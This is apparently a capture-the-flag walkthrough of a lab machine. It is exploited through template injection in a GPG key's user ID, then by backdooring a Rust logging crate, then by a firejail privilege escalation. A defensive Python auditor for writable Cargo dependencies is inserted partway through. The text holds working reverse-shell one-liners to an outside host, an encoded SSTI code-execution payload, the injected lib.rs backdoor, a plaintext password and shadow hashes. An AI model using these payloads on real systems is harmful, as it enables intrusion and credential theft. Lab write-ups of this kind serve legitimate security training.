Basic Information

Port Scan

22,80,443:

$ nmap -sC -sV -Pn 10.10.11.218
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-19 13:35 CST
Nmap scan report for 10.10.11.218
Host is up (0.093s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://ssa.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
| ssl-cert: Subject: commonName=SSA/organizationName=Secret Spy Agency/stateOrProvinceName=Classified/countryName=SA
| Not valid before: 2023-05-04T18:03:25
|_Not valid after: 2050-09-19T18:03:25
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Secret Spy Agency | Secret Security Service
1096/tcp filtered cnrprotocol
9207/tcp filtered wap-vcal-s
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.02 seconds

80/443

A hosts entry is needed:

10.10.11.218 ssa.htb

The official website of a security agency, built with Flask:

PGP

The contact page requires submitting a PGP-encrypted message:

Following the hint into the guide, it offers several GPG functions: encryption, decryption, signature verification and the like:

Verify Signature

For the following steps, generate a new key pair, since some key attributes will be modified and we do not want to affect the main key:

gpg --quick-gen-key miao

gpg --armor --export miao > pubkey.asc
echo 'miao' | gpg --clearsign

Testing the signature verification feature with the public key and the signed message, the output contains some of the attributes set on our key:

SSTI

Modify the attributes in the GPG key; since we know from earlier that the site is Flask, test for SSTI:

gpg --edit-key miao
gpg> adduid
Real name: {{7*7}}
Email address: miao@miao.com
Comment:
You selected this USER-ID:
"{{7*7}} <miao@miao.com>"

Just follow the article step by step; once done, repeat the earlier steps and verify the signature, and the SSTI is executed successfully:

reverse shell

Then test various commands, and finally obtain a shell as atlas:

/bin/bash -i >& /dev/tcp/10.10.14.16/4444 0>&1

L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE2LzQ0NDQgMD4mMQo=

{{ self.__init__.__globals__.__builtins__.__import__('os').popen('bash -c "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjE2LzQ0NDQgMD4mMQo= | base64 -d | bash" ').read() }}

Information

firejail

Simple enumeration shows that we are inside a firejail sandbox:

httpie

Digging through the httpie directory layer by layer, admin.json yields silentobserver's password:

silentobserver
quietLiketheWind22

user flag

Log in over SSH as the silentobserver user:

Information

Running pspy in the silentobserver context (since atlas is inside the sandbox, wget, curl and the like cannot be used), we find that root periodically compiles and runs the tipnet project, written in Rust, in the context of the atlas user:

tipnet

We have permission to read both the source code and the binary; a test run shows that our actions are all recorded in a log:

logger

Looking at the code, it uses an external library, logger:

And the current user has write permission on logger:

shell

So we can modify logger's code directly to execute commands; refer to this, and the modification does not affect the original functionality:

wget http://10.10.14.16:7777/lib.rs -O lib.rs

After modifying it, wait for tipnet to run and obtain an unrestricted atlas shell; write an SSH public key for convenience in the later steps:

lib.rs

extern crate chrono;

use std::fs::OpenOptions;
use std::io::Write;
use chrono::prelude::*;
use std::process::Command;

pub fn log(user: &str, query: &str, justification: &str) {
    // Injected part: run the reverse shell before the original logging logic
    let command = "bash -i >& /dev/tcp/10.10.14.16/4444 0>&1";

    let output = Command::new("bash")
        .arg("-c")
        .arg(command)
        .output()
        .expect("not work");

    if output.status.success() {
        let stdout = String::from_utf8_lossy(&output.stdout);
        let stderr = String::from_utf8_lossy(&output.stderr);

        println!("standard output: {}", stdout);
        println!("error output: {}", stderr);
    } else {
        let stderr = String::from_utf8_lossy(&output.stderr);
        eprintln!("Error: {}", stderr);
    }

    // Original logger behaviour, kept intact: append a timestamped entry to the access log
    let now = Local::now();
    let timestamp = now.format("%Y-%m-%d %H:%M:%S").to_string();
    let log_message = format!(
        "[{}] - User: {}, Query: {}, Justification: {}\n",
        timestamp, user, query, justification
    );

    let mut file = match OpenOptions::new()
        .append(true)
        .create(true)
        .open("/opt/tipnet/access.log")
    {
        Ok(file) => file,
        Err(e) => {
            println!("Error opening log file: {}", e);
            return;
        }
    };

    if let Err(e) = file.write_all(log_message.as_bytes()) {
        println!("Error writing to log file: {}", e);
    }
}
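The weakness that made the lib.rs swap possible is a build-chain one: a privileged scheduled job compiled a crate whose path dependency was writable by a lower-privileged user. The following is an added audit example, not code from the write-up or the tipnet project: it parses the path dependencies out of a Cargo.toml with a small line-oriented parser (no TOML library needed) and reports any file or directory under them that is group/world-writable or owned by someone other than the build user. The manifest text is constructed in the shape the write-up implies (a `logger` crate pulled in by path); the real tipnet manifest is not on the page. Mode bits are checked from stat rather than os.access because the job in question runs as root, for whom every access check passes.

```python
import os
import re
import shutil
import stat
import tempfile
from pathlib import Path

# Constructed sample manifest (the real tipnet Cargo.toml is not reproduced in the write-up)
CONSTRUCTED_MANIFEST = """
[package]
name = "tipnet"
version = "0.1.0"
edition = "2021"

[dependencies]
logger = { path = "../logger" }
"""

INLINE_DEP = re.compile(r'^\s*([A-Za-z0-9_-]+)\s*=\s*\{[^}]*\bpath\s*=\s*"([^"]+)"')
DEP_TABLE = re.compile(r'^\s*\[(?:dev-|build-)?dependencies\.([A-Za-z0-9_-]+)\]\s*$')
PATH_KEY = re.compile(r'^\s*path\s*=\s*"([^"]+)"')


def path_dependencies(manifest_text):
    """Map dependency name -> relative path for every `path = "..."` dependency.
    Handles inline tables and [dependencies.<name>] tables."""
    deps, current_table = {}, None
    for line in manifest_text.splitlines():
        m = DEP_TABLE.match(line)
        if m:
            current_table = m.group(1)
            continue
        if line.lstrip().startswith("["):
            current_table = None  # any other table header ends a dependency table
            continue
        m = INLINE_DEP.match(line)
        if m:
            deps[m.group(1)] = m.group(2)
            continue
        if current_table:
            m = PATH_KEY.match(line)
            if m:
                deps[current_table] = m.group(1)
    return deps


def audit_path_dependencies(manifest, build_uid=None):
    """Walk each path dependency and report anything someone other than the build
    user could modify. Findings are (dependency, path, reason) tuples."""
    manifest = Path(manifest)
    build_uid = os.getuid() if build_uid is None else build_uid
    findings = []
    for name, rel in path_dependencies(manifest.read_text()).items():
        dep_dir = (manifest.parent / rel).resolve()
        if not dep_dir.is_dir():
            findings.append((name, str(dep_dir), "path dependency missing"))
            continue
        for dirpath, _dirnames, filenames in os.walk(dep_dir):
            for p in [dirpath, *(os.path.join(dirpath, f) for f in filenames)]:
                st = os.stat(p)
                if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((name, p, "group/world-writable"))
                elif st.st_uid != build_uid:
                    findings.append((name, p, "owned by uid %d, not build uid %d"
                                     % (st.st_uid, build_uid)))
    return findings


def demo():
    """Build a throwaway tipnet/ + logger/ tree in which logger/src/lib.rs is
    group-writable (the situation the write-up found) and audit it."""
    root = Path(tempfile.mkdtemp())
    try:
        (root / "tipnet").mkdir()
        (root / "tipnet" / "Cargo.toml").write_text(CONSTRUCTED_MANIFEST)
        src = root / "logger" / "src"
        src.mkdir(parents=True)
        lib = src / "lib.rs"
        lib.write_text("pub fn log(user: &str, query: &str, justification: &str) {}\n")
        os.chmod(src, 0o775)   # constructed: group-writable directory
        os.chmod(lib, 0o664)   # constructed: group-writable source file
        return audit_path_dependencies(root / "tipnet" / "Cargo.toml")
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for dep, path, reason in demo():
        print("%s: %s (%s)" % (dep, path, reason))
```

Run against a real checkout as `audit_path_dependencies("/opt/tipnet/Cargo.toml", build_uid=0)` to ask the question root should have asked before compiling: can anyone but me change what I am about to build and run? The fix on the defending side is the same for every finding: make the dependency tree owned by the build user with no group or world write bits, or vendor the crate into the project.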

Privilege Escalation Information

SUID firejail, similar to the earlier Cerberus machine:

find / -perm -4000 -user root 2>/dev/null

/usr/local/bin/firejail

Can we skip the intermediate steps and go straight from the silentobserver user to this SUID firejail? In fact we cannot: silentobserver has no permission to execute firejail, while the atlas user, being in the jailer group, can:

Privilege Escalation & root flag

Step by step, then; the same problem as before: the sudo it provides does not work, but a direct su does:

wget 10.10.14.16:7777/firejoin.py
# first terminal
python3 firejoin.py
# second terminal
firejail --join=13520
su -

shadow

root:$y$j9T$Pg7Bm6pt5ZGjXKjHtVx1A0$oUzCb1AdkT8LSqDw/S8epzo8NulMfPH1siYjXUbZl0B:19395:0:99999:7:::
silentobserver:$y$j9T$bCOHQ6BXJpACSRhEUptt50$2gOEbQ08M76nlLu6F5RJX61ufBUDSW67zVfwRdHcsI4:19394:0:99999:7:::
atlas:$y$j9T$G9Wo78J1wNdBpflU3JDbb1$A087OjgjVVM7G/DrtMLWev77DZfpOQU2iidRClpCJbD:19395:0:99999:7:::

References